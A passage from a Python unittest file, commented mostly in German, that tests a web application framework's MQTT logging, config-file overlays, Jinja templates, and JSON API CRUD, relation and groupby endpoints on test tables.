"test": {"a":2}
})
self.assertEqual(
config.test, {"a":2, "time": localtime }, "Fehler bei config update")
# ohne mqtt findet default logging statt (konsole)
# .. todo:: Konsole logger funktionen noch überprüfen
logger = logging.getLogger( "MQTT" )
logger.debug('logger.debug')
logger.info("logger.info")
logger.warning("logger.warning")
logger.error("logger.error")
# mqtt logging prüfen
#
if config.get("server.mqtt.host", "") == "":
print( "(MQTT) keine Angaben in config vorhanden. MQTT wird nicht getestet!")
return
# config mit anderem mqttLevel
config = ispConfig( mqttlevel=30 )
mqtt = config.mqttGetHandler()
self.assertIsNotNone(
mqtt, "kein MQTT handler vorhanden")
results = {}
mqtt_event = threading.Event()
mqttResult = None
def onMqtt( msg ):
global mqttResult
# in results die empfangenen ablegen
mqttResult = msg
results[ msg["topic"] ] = msg["payload"]
mqtt_event.set()
# funktion bei signal aufrufen
mqtt.signal.connect( onMqtt )
def publishThread( args ):
global mqttResult
mqttResult = None
mqtt_event.clear()
# call publish as a thread; the result arrives via the onMqtt callback and mqtt_event (a reduced stdlib sketch of this pattern follows after this test)
thread = threading.Thread( target=mqtt.publish, args=( args,) )
thread.start()
# wait at most 3 seconds or until mqtt_event is set in onMqtt
while not mqtt_event.wait( timeout=3 ):
mqtt_event.set()
return mqttResult
# die eigenen script infos
result = publishThread({
"topic": "cmnd/status"
} )
self.assertEqual(
result["topic"], "stat/status", "Fehler bei cmnd/status abfrage")
# python process vorhanden?
result = publishThread({
"topic": "cmnd/process",
"payload" : "python"
} )
#print("----------------------cmnd/process", result )
self.assertEqual(
result["topic"], "stat/process", "Fehler bei process abfrage")
# publish ohne topic - publish wird nicht aufgerufen
# hier wird in publishThread auf timeout gewartet
result = publishThread({
"payload": "publish ohne topic - publish wird nicht aufgerufen"
})
self.assertIsNone(
result, "Fehler bei process abfrage")
# publish ohne payload - publish wird mit leerem payload aufgerufen
result = publishThread({
"topic": "cmnd/test/leer"
})
self.assertEqual(
result["payload"], "", "Fehler bei leerem payload")
# payload mit object - publish wird mit leerem payload aufgerufen nur (str, bytearray, int, float) ist ok
result = publishThread({
"topic": "cmnd/test/object",
"payload": object()
})
self.assertEqual(
result["payload"], "", "Fehler bei object payload")
# payload als Text
result = publishThread({
"topic": "cmnd/test/string",
"payload": "payload als Text"
})
self.assertEqual(
result["payload"], "payload als Text", "Fehler bei text payload")
# payload als dict
result = publishThread({
"topic": "cmnd/test/dict",
"payload": {"text":"payload als dict"}
})
self.assertEqual(
result["payload"], {"text":"payload als dict"}, "Fehler bei dict payload")
# mqtt.client.subscribe( "gqa_dev/logging/#" )
# mqtt funktionen über logger
logger = logging.getLogger( "MQTT" )
logger.setLevel( logging.DEBUG )
logger.send()
logger.send("test/publish")
logger.progressStart( "test" )
logger.progress( "test", 50 )
logger.progressReady( "test" )
# test via mqtt instead of directly via the logger
mqtt.logging = True
mqtt.info("config.info")
mqtt.warning("config.warning")
mqtt.error("config.error")
# .. todo:: config ohne mqtt Ausgabe auf der Konsole
config.mqttCleanup()
mqtt.info("config.info nach cleanup")
mqtt.warning("config.warning nach cleanup")
mqtt.error("config.error nach cleanup")
# config mit falschen mqtt Angaben
#
config = ispConfig( )
port = config._config.server.mqtt.port
config._config.server.mqtt.port = 111111
config.mqttInitLogger( cleanup=True )
mqtt = config.mqttGetHandler()
self.assertIsNone(
mqtt, "Trotz init Fehler MQTT handler vorhanden")
#mqtt.info("config.info nach Fehler bei MQTT config")
config._config.server.mqtt.port = port
config.mqttInitLogger( cleanup=True )
time.sleep(4) # sleep for 4 seconds to receive mqtt messages
# hier gibt es keine Ausgaben, da mqtt nicht mehr da ist
logger.info("logger.info nach MQTT init Fehler")
logger.send("cmnd/test/publish", "nach MQTT init Fehler")
time.sleep(2) # sleep for 2 seconds to receive the logger mqtt messages
#print( results )
self.assertIn(
"cmnd/test/publish", results, "Fehler nach MQTT init Fehler")
#mqtt.publish({
# "topic": "cmnd/status"
#})
# mqtt in config schließen
config.mqttCleanup( )
#print( results )
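# Hedged sketch of the thread/event pattern used by publishThread in
# test_config_mqtt above, reduced to the standard library: start a worker
# thread, then wait on a threading.Event with a timeout instead of blocking
# forever. Not called by any test; the worker stands in for the mqtt callback.
def _example_wait_for_event( self, timeout=3 ):
    import threading
    done = threading.Event()
    result = {}
    def worker():
        result["payload"] = "done"    # what onMqtt would deliver
        done.set()
    thread = threading.Thread( target=worker )
    thread.start()
    # like publishThread: give up after the timeout and return None
    if not done.wait( timeout=timeout ):
        return None
    return result.get( "payload" )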
def test_config_files( self ):
# einfach config bereitstellen
config = ispConfig( )
temp_conf = {
"unittest": True,
"version" : "0.0.1",
"variables": {
"Version" : "0.0.1a",
},
"value": 0,
"content": "test"
}
config = ispConfig( config = temp_conf )
test = {
"value" : config.get("value"),
"content" : config.get("content"),
"info" : config.get("info")
}
self.assertDictEqual(test, {
"value" : 0,
"content" : "test",
"info" : None
}, "config Rückgabe stimmt nicht")
# Versions Angabe prüfen
# zusätzliche Dateien anlegen
unitest_json_file_00 = os.path.join( config.BASE_DIR, "config", "config-18200000.json")
with open(unitest_json_file_00, 'w') as f:
f.write( '{ "value": 0, "content": "test" }' )
unitest_json_file_01 = os.path.join( config.BASE_DIR, "config", "config-18200101.json")
with open(unitest_json_file_01, 'w') as f:
f.write( '{ "value": 1, "info": "info 18200101" }' )
unitest_json_file_05 = os.path.join( config.BASE_DIR, "config", "config-18200105.json")
with open(unitest_json_file_05, 'w') as f:
f.write( '{ "value": 5, "info": "info 18200105" }' )
config = ispConfig( )
test = {
"value" : config.get("value"),
"content" : config.get("content"),
"info" : config.get("info")
}
self.assertDictEqual(test, {
"value" : 5,
"content" : "test",
"info" : "info 18200105"
}, "config Rückgabe stimmt nicht")
config = ispConfig( lastOverlay="18200101" )
test = {
"value" : config.get("value"),
"content" : config.get("content"),
"info" : config.get("info")
}
self.assertDictEqual(test, {
"value" : 1,
"content" : "test",
"info" : "info 18200101"
}, "config Rückgabe stimmt nicht")
os.remove( unitest_json_file_00 )
os.remove( unitest_json_file_01 )
os.remove( unitest_json_file_05 )
# config-0000.json mit falschen Inhalt erzeugen,
# Fehler prüfen und Datei wieder löschen
#
error_json_file = os.path.join( config.BASE_DIR, "config", "config-0000.json")
with open(error_json_file, 'w') as f:
f.write( "#Falscher Inhalt" )
config = ispConfig()
self.assertEqual(
config._loadErrors, [ error_json_file ], "load error wurde nicht ausgelöst")
os.remove( error_json_file )
def test_config_jinja(self):
'''Test the jinja template functions of the config.
'''
# eine eigene config mit resources im tests Ordner
config = ispConfig( config={
"server": {
"webserver": {
"resources" : os.path.join( ABSPATH, "resources" )
}
}
})
# das aktuelle datum
datum = datetime.now().strftime('%d.%m.%Y')
result_A = """<ul>
<li>testuser</li>
</ul>
<ul>
<li>Datum aus Parameter <strong>datum</strong> :{{datum}}</li>
<li>Inhalt aus Parameter: {{user}}</li>
</ul>
Datum mit now: #datum#""".replace( "#datum#", datum )
result_B = """<ul>
<li>testuser</li>
</ul>
<ul>
<li>Datum aus Parameter <strong>datum</strong> :#datum#</li>
<li>Inhalt aus Parameter: testuser</li>
</ul>
Datum mit now: #datum#""".replace( "#datum#", datum )
meta = {
"user" : "testuser",
"datum": "{{ now.strftime('%d.%m.%Y') }}",
"name": "{{user}}"
}
tpl = """{% markdown %}
* {{ user }}
{% endmarkdown %}
{% include "test_template.tmpl" %}
Datum mit now: {{ now.strftime('%d.%m.%Y') }}"""
result = config.render_template( tpl, meta, deep_replace=False )
self.assertEqual(result, result_A, "template nicht OK")
result = config.render_template( tpl, meta, deep_replace=True )
self.assertEqual(result, result_B, "template nicht OK")
def test_webapp_base_system( self ):
''' Webapp calls to the system functions
'''
response = self.app.get( "api/system" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
response = self.app.get( "api/system", query_string = { "format" : "html" } )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
response = self.app.get( "api/system/test", query_string = { "zahl" : 12 } )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual(
response.json["data"],
{ "_ispcp": {}, "bool": False, "text": "typenlos", "zahl": 12.0},
"Response data nicht OK"
)
response = self.app.get( "api/system/15" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual(
response.json["data"]["kwargs"],
{'format': 'html', 'info': 'kwargs', 'systemId': '15'},
"Response data nicht OK"
)
# print("test_webapp_base_system", response.json )
def test_webapp_base_statics( self ):
''' Webapp calls to static content
'''
# index auf zwei arten aufrufen
response = self.app.get( "/" )
#self.assertEqual(response.status_code, 200, "Api Status nicht 200")
index = response.data
response = self.app.get( "/render/index", query_string = {
"zahl":"012",
"bool":True,
"test":1,
"_ispcp": json.dumps( {"name":"B"} )
} )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(index, response.data, "index und render/index nicht gleich")
# render a template that does not exist in ui
response = self.app.get( "/render/keintemplate" )
self.assertEqual(response.status_code, 404, "render auf ein nicht vorhandenes Template in ui")
# load auf nicht vorhandene Datei testen
response = self.app.get( "/globals/js/keinedatei" )
self.assertEqual(response.status_code, 404, "load auf nicht vorhandene Datei")
# in ui eine unittest_route.phtml erzeugen
route_file = os.path.join( ABSPATH , "..", "ui", "unittest_route.phtml")
with open(route_file, 'w') as f:
f.write( "value={{ value }}" )
# ohne parameter
response = self.app.get( "/unittest_route" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(response.data, b"value=None", "Inhalt ist nicht value=None;_ispcp=")
# zwei gleiche parameter (nur der erste wird verwendet)
response = self.app.get( "/unittest_route?value=12&value=1" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(response.data, b"value=12", "Inhalt ist nicht value=12;_ispcp= FirstValueURIParser")
# unittest_route.phtml in ui wieder entfernen
os.remove( route_file )
# in ui eine unittest_route_ispcp.phtml erzeugen
route_file1 = os.path.join( ABSPATH , "..", "ui", "unittest_route_ispcp.phtml")
with open(route_file1, 'w') as f:
f.write( "{{ params }}" )
# Parameter als dict
response = self.app.get( '/unittest_route_ispcp' , query_string = {
"name":"A",
"uuid":1,
"id":1,
"_ispcp": json.dumps( {"name":"B"} )
} )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual( json.loads( response.data.decode('utf-8') ), {"uuid": "1", "id": "1", "name": "B"}, "Inhalt ist nicht mit dict")
# unittest_route_ispcp.phtml in ui wieder entfernen
os.remove(route_file1)
#
# mit fehler bei _ispcp
response = self.app.get( "/render/index", query_string = {
"zahl":"012",
"bool":True,
"test":1,
"_ispcp": "name"
} )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
def test_webapp_base_extras( self ):
''' Website calls for additional content
'''
# htmlcov laden geht nur wenn es schon erzeugt wurde
htmlcov_path = osp.join( ABSPATH , "..", ".htmlcov")
if osp.isdir( htmlcov_path ):
response = self.app.get( "/coverage" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
response = self.app.get( "/coverage/coverage.css" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
else:
print( "(coverage) Test erst nach dem Erstellen möglich." )
# über resources laden
response = self.app.get( "resources/logo.png" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# über fonts laden aber mit Fehler für coverage
response = self.app.get( "fonts/irgendwas" )
self.assertEqual(response.status_code, 404, "Api Status nicht 404")
# über dbadminframe laden
response = self.app.get( "dbadminframe" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# docs iframe laden
response = self.app.get( "/docs" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# /docs/ wird zu /docs also auch iframe laden
response = self.app.get( "/docs/" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# docs laden (beim ersten Aufruf erzeugen)
response = self.app.get( "/docs/index.html" )
# es kommt vor das erst beim 2. Aufruf alles erzeugt wird
if response.status_code == 404:
# 2. Versuch
response = self.app.get( "/docs/index.html" )
# jetzt OK
self.assertEqual(response.status_code, 200, "docs Aufruf Api Status nicht 200. Wurde docs erzeugt?")
# dbadmin laden
response = self.app.get( "/dbadmin" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# new webapp without parameters
webapp = ispBaseWebApp( )
self.assertEqual(webapp._config.get("server.webserver.TESTING"), True, "Testing ist nicht True")
# new webapp with a dict containing only the TESTING setting
webapp = ispBaseWebApp( {"server" : {"webserver" : { "TESTING": True } } } )
self.assertEqual(webapp._config.get("server.webserver.TESTING"), True, "Testing ist nicht True")
def test_webapp_base_api( self ):
# Inhalt von swagger mit der Angabe in custom_swagger_path prüfen
response = self.app.get( "api/swagger.json" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["info"]["title"], "swagger test", "swagger file nicht ok")
self.assertEqual(
list( response.json["paths"].keys() ),
['/dbtests/', '/dbtests/groupby', '/dbtests/test', '/dbtests/undefined', '/dbtests/{dbtestsId}/', '/dbtests/{dbtestsId}/dbtestsrel',
'/dbtestsrel/', '/dbtestsrel/groupby', '/dbtestsrel/undefined', '/dbtestsrel/{dbtestsrelId}/', '/dbtestsrel/{dbtestsrelId}/dbtests',
'/dummy/', '/dummy/pdf', '/dummy/test', '/dummy/{dummyId}/',
'/system/', '/system/test', '/system/{systemId}/'
],
"Fehlerhafte paths Angaben in swagger.json")
response = self.app.get( "api/gibtsnicht" )
self.assertEqual(response.status_code, 404, "Fehlerhafter api Zugriff ist nicht 404")
def test_webapp_dummy_test( self ):
''' Perform api call
GET /api/dummy/
'''
# --- dummy Klasse abfragen
# dummy api_list abfragen
response = self.app.get( "api/dummy" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"], [{
'attributes': {'function': 'api_list', 'kwargs': {'_ispcp': {}}},
'id': '12',
'links': {'self': 'http://localhost/api/dummy/12/'},
'type': 'dummy'
}],
"falsche api_list Rückgabe"
)
# dummy api_get abfragen wird dummyId mitgegeben
response = self.app.get( "api/dummy/12" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
#print(response.json["data"][0])
self.assertDictEqual(
response.json["data"], {
'attributes': {'dummyId': '12'},
'id': 12,
'links': {'self': 'http://localhost/api/dummy/12/'},
'type': 'dummy'
},
"falsche id Rückgabe"
)
#print( response.json )
# call test without the required field - must be rejected
response = self.app.get( "api/dummy/test" )
# print("api/dummy/test", response.json )
self.assertEqual(response.status_code, 400, "Api Status nicht 400")
self.assertDictEqual(
response.json,
{
"message": {
"zahl": "Eine Zahl"
}
},
"nicht abgelehnt ohne Pflichfeld Angabe"
)
# ohne text (hat default) mit test (nicht vorhanden)
# /api/system/test?zahl=012&bool=True&test=1&_ispcp={"name":"B"}
response = self.app.get( "api/dummy/test", query_string={
"zahl":"012",
"bool":True,
"test":1,
"_ispcp": json.dumps( {"name":"B"} )
} )
# kommen auch zusätzliche Angaben und werden unnötige ausgefiltert
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertDictEqual(
response.json["data"],
{
"_ispcp": {"name": "B"},
"bool": True,
"text": "typenlos",
"zahl": 12.0
},
"Parameter Auswertung falsch"
)
response = self.app.get( "api/dummy/undefined" )
# einen undefined holen
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"],
[{'attributes': {}, 'id': 'undefined', 'type': 'dummy'}],
"undefined fehlerhaft"
)
# Dummy ohne funktion gibt undefined Datensatz
response = self.app.get( "api/dummy/gibtsnicht" )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"],
{ 'attributes': {}, 'id': 'undefined', 'type': 'dummy' },
"Dummy ohne funktion gibt keine undefined datensatz "
)
#
response = self.app.get( "api/dummy/test", query_string={ "zahl": 1 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json["data"],
[],
"Test leere Liste"
)
response = self.app.get( "api/dummy/test", query_string={ "zahl": 2 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json["data"],
[{"a": 1, "b": 2}],
"Test Liste mit einem Element"
)
# fehler bei der Umwandlung data bleibt leer
response = self.app.get( "api/dummy/test", query_string={ "zahl": 3 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json["data"],
[],
"fehler bei der Umwandlung data bleibt leer"
)
response = self.app.get( "api/dummy/test", query_string={ "zahl": 4 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
#print( response.json )
response = self.app.get( "api/dummy/test", query_string={ "zahl": 5, "_ispcp" : "{test}"} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['App-Error'],
[{'message': 'swagger Parameter Json Error', 'info': '_ispcp={test}'}],
"Parameter Json Error"
)
# _int_query selbst aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 6 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['data'],
[{'A': 1}, {'B': 2}],
"Parameter Json Error"
)
# _int_group_query selbst aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 7 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['App-Error'],
[],
# [{'message': 'Fehler bei _int_group', 'info': "'dummyQuery' object has no attribute 'group_by'"}],
"_int_group_query selbst aufrufen"
)
# access_cls selbst aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 8 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['data'],
[{'nicht da': ''}, {'sqlalchemy.BigInteger': ''}],
"access_cls selbst aufrufen"
)
# iso2date aufrufen
response = self.app.get( "api/dummy/test", query_string={ "zahl": 9 } )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual(
response.json['data'],
[
{'test=None': None},
{'20180415=2018-04-15': '2018-04-15'},
{'2018-04-15=2018-04-15': '2018-04-15'},
{'2018-04-15 14:36:25=2018-04-15': '2018-04-15'},
{'2018-04-15=18-04-15 00:00:00': '2018-04-15 00:00:00'},
{'2018-04-15 14:36:25=2018-04-15 14:36:25': '2018-04-15 14:36:25'},
{'20180415 14:36:25=2018-04-15 14:36:25': '2018-04-15 14:36:25'},
{'20180415 14:36=2018-04-15 14:36:00': '2018-04-15 14:36:00'},
{'201A0415 14:36:25=None': None},
{'201A0415 14:36=None': None},
{'201A0415=None': None}
],
"iso2date aufrufen"
)
# versuchen eine vorhandene Funktion ohne rpc Kennung aufzurufen
response = self.app.get( "api/dummy/norpc" )
self.assertEqual(response.status_code, 400, "Status nicht 400")
self.assertEqual(
response.json,
{},
"versuchen eine vorhandene Funktion ohne rpc Kennung aufzurufen"
)
#print( response.json )
def test_webapp_db_tests_A( self ):
''' Perform api call
GET /tests/
'''
# zuerst den zugriff testen und prüfen ob die tabelle 5 datensätze hat
#
response = self.app.get( "api/dbtests/", query_string={})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len(response.json["data"]), 5, "keine 5 Datensätze"
)
#
# einen Datensatz zusätzlich einfügen
#
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sechs", # Pflichtfeld
#"date":"2020-08-19",
"integer":6
},
"type":"dbtests"
}
}), follow_redirects=True)
self.assertEqual(response.status_code, 201, "Api Status nicht 201 (Created)")
self.assertEqual( response.json["data"]["id"], '6', "Datensatz id ist nicht 6")
# record merken
newRecord6 = response.json["data"]["attributes"]
id6 = response.json["data"]["id"]
link6 = response.json["data"]["links"]["self"]
#
# einen zweiten einfügen
#
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sieben", # Pflichtfeld
#"date":"2020-08-19",
"integer":7
},
"type":"dbtests"
}
}), follow_redirects=True)
self.assertEqual(response.status_code, 201, "Api Status nicht 201 (Created)")
self.assertEqual( response.json["data"]["id"], '7', "Datensatz id ist nicht 7")
# record merken
newRecord7 = response.json["data"]["attributes"]
id7 = response.json["data"]["id"]
link7 = response.json["data"]["links"]["self"]
#
# jetzt alle holen und prüfen
#
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( len(response.json["data"]), 7, "Datensatzanzahl ist nicht 7")
id = response.json["data"][5]["id"] # zählung ab 0 (5 ist record 6)
record = response.json["data"][5]["attributes"]
link = response.json["data"][5]["links"]["self"]
self.assertEqual( id, id6, "Datensatz id=6 vom ersten stimmt nicht")
self.assertEqual( record, newRecord6, "Datensatz Inhalt vom ersten stimmt nicht")
#
# den siebten Datensatz über den angegebenen link holen
#
response = self.app.get( link7 )
self.assertEqual( response.json["data"]["id"], '7', "Datensatz Id Rückgabe ist nicht 7")
self.assertEqual( type(response.json["data"]), dict, "Datensatz data ist kein dict")
# Inhalt vergleichen
self.assertEqual( response.json["data"]["attributes"], newRecord7, "Datensatz Inhalt stimmt nicht")
#
# siebten Datensatz ändern - die id muss in body und path angegeben werden
#
response = self.app.patch( link7, headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
# "date":"2020-08-19 00:00", # 2020-08-20, 00:00
"string":"changed",
},
"id": '7',
"type":"dbtests"
}
}), follow_redirects=True)
# 200 - Request fulfilled, document follows
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
# Inhalt darf nicht mehr gleich sein
self.assertNotEqual( response.json["data"], newRecord7, "Datensatz Inhalt ist noch gleich")
#
# den zweiten Datensatz über den angegebenen link holen und Änderungen prüfen
#
response = self.app.get( link7 )
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"]["attributes"]["string"], "changed", "Feldinhalt ist nicht changed")
# alle holen
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
lastCount = len(response.json["data"] )
# Datensatz 6 und 7 löschen
response = self.app.delete( link6, headers={'Content-Type': 'application/json'} )
self.assertEqual(response.status_code, 204, "Api Status nicht 204")
# alle verbleibenden holen und Anzahl prüfen
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(len(response.json["data"] ), lastCount - 1 , "Api Status nicht {}".format( lastCount - 1 ))
# jetzt noch 7 löschen
response = self.app.delete( link7, headers={'Content-Type': 'application/json'} )
self.assertEqual(response.status_code, 204, "Api Status nicht 204")
# nach dem löschen Anzahl prüfen
response = self.app.get( "api/dbtests/", query_string={})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len(response.json["data"]), 5, "keine 5 Datensätze nach dem löschen von 6 und 7"
)
# fehler bei falschem patch
response = self.app.patch( link7, headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string_gibtsnicht":"changed",
},
"id": '99',
"type":"dbtests"
}
}), follow_redirects=True)
self.assertEqual(response.status_code, 500, "Api Status nicht 500")
self.assertEqual(
response.json["App-Error"],
[{'message': 'patch - unbekannter Fehler', 'info': '500'}],
"fehler bei falschem patch"
)
def test_webapp_db_tests_B( self ):
''' Perform api call
GET /tests/
'''
# einen undefined holen
response = self.app.get( "api/dbtests/undefined")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["data"],
[{'attributes': {
'aktiv': None,
'data': None,
'date': None,
'decimal': None,
'float': None,
'gruppe': None,
'integer': None,
'isodate': None,
'isodatetime': None,
'numeric': None,
'string': None,
'tags': None
}, 'id': 'undefined', 'type': 'dbtests'}],
"einen undefined holen"
)
# funktion test in dbtests aufrufen - gibt 205 als code
response = self.app.get( "api/dbtests/test", query_string={
"zahl" : 12 # Pflichfeld
})
#print(response.json["data"])
self.assertEqual(response.status_code, 205, "Api Status nicht 205")
self.assertDictEqual(
response.json["data"],
{'attributes': {
'aktiv': None,
'data': None,
'date': None,
'decimal': None,
'float': None,
'gruppe': None,
'integer': None,
'isodate': None,
'isodatetime': None,
'numeric': None,
'string': None,
'tags': 'defaulttag'
}, 'id': 'undefined', 'type': 'dbtests'},
"einen undefined holen"
)
# fehler bei falscher Filterangabe
response = self.app.get( "api/dbtests/", query_string={
"zahl" : 12, # Pflichfeld
"filter" : "eq(tid=1)"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
response.json["App-Error"],
[{
'message': '_int_filter',
'info': 'RQL Syntax error: (\'eq(tid=1)\', 6, \'Expected ")"\')'
}],
"fehler bei falscher Filterangabe "
)
# wird nur für htmlcov aufgerufen
response = self.app.get( "api/dbtests/test", query_string={
"dbtestsId" : 2, # mit cls.object_id
"zahl" : 12 # Pflichfeld
})
self.assertEqual(response.status_code, 205, "Api Status nicht 205")
def test_webapp_db_tests_C( self ):
# einen nicht vorhandenen Datensatz abrufen
# FIXME: suppress the message on the console - catch it earlier in method_wrapper?
response = self.app.get( "api/dbtests/100")
self.assertEqual(response.status_code, 404, "Api Status nicht 404 - notFound")
def test_webapp_db_relation( self ):
''' Api call for relation tables
api/dbtestsrel?filter=eq(dbtests_id,2)
[{'attributes': {'dbtests_id': 2, 'rdata': None, 'rdate': None, 'rgroup': 'B', 'rinteger': 12, 'rstring': 'r_zwei'}, 'id': '2', 'links': {'self': 'http://localhost/api/dbtestsrel/2/'}, 'relationships': {'dbtests': {'data': None, 'links': {'self': 'http://localhost/api/dbtestsrel/2/dbtests'}}}, 'type': 'dbtestsrel'}]
'''
# zuerst den zugriff testen und prüfen ob die tabelle leer ist
#
response = self.app.get( "api/dbtests/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len( response.json["data"] ), 5, "keine 5 Datensätze"
)
response = self.app.get( "api/dbtestsrel/")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
len(response.json["data"]), 5, "keine 5 Datensätze"
)
# daten über path und filter müssen gleich sein nur die globale links Angabe unterscheidet sich
# http://127.0.0.1:5000/api/nutzung?_ispcp={%22_default%22:{%22ersatz_id%22:1754}}&filter=eq(ersatz_id,1754)&page[offset]=0&page[limit]=25
response = self.app.get( "api/dbtests/2/dbtestsrel")
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
reldata = response.json
response = self.app.get( "api/dbtestsrel", query_string={
"filter":"eq(dbtests_id,2)"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(
reldata["data"], response.json["data"],
"Rückgaben sind nicht gleich"
)
def test_webapp_db_group( self ):
''' Api calls for grouped queries (groupby)
# without a groups specification, fields is used
/api/<modul>/groupby?fields[<modul>]=<feld1>
# with groups
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&groups=<feld1,feld2>
# with groups and delimiter
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&groups[<modul>]=<feld1,feld2>&delimiter=,
# with filter
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&filter=eq(aktiv,true)
# with labels
/api/<modul>/groupby?fields[<modul>]=<feld1,feld2>&labels={"dbtests.gruppe": "Hallo"}
A combined sketch (fields + filter + labels) follows after this test.
'''
# mit fields Angabe
response = self.app.get( "api/dbtests/groupby", query_string={
"fields[dbtests]":"gruppe"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'hasChildren': 1, 'gruppe': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'C'}, 'id': None, 'type': 'dbtests'}
], "groupby mit fields Angabe Rückgabe fehlerhaft " )
# mit groups Angabe
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"gruppe"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'hasChildren': 1, 'gruppe': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'gruppe': 'C'}, 'id': None, 'type': 'dbtests'}
], "groupby mit groups Angabe Rückgabe fehlerhaft " )
# mit Filter und zwei Gruppierungs Feldern
response = self.app.get( "api/dbtests/groupby", query_string={
"groups[dbtests]":"gruppe,tags",
"filter":"eq(aktiv,true)"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'gruppe': 'A', 'hasChildren': 1, 'tags': 'A,K'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'gruppe': 'B', 'hasChildren': 1, 'tags': 'A,K'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'gruppe': 'C', 'hasChildren': 1, 'tags': 'M,K'}, 'id': None, 'type': 'dbtests'}
], "groupby mit Filter und zwei Gruppierungs Feldern fehlerhaft " )
# mit delimiter
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"tags",
"delimiter": ","
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],[
{'attributes': {'tags': 'A'}},
{'attributes': {'tags': 'B'}},
{'attributes': {'tags': 'K'}},
{'attributes': {'tags': 'M'}}
], "groupby mit delimiter Rückgabe fehlerhaft " )
# groupby mit label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"gruppe",
"labels": '{"dbtests.gruppe": "lGruppe"}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],
[
{'attributes': {'hasChildren': 1, 'lGruppe': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppe': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppe': 'C'}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit label fehlerhaft " )
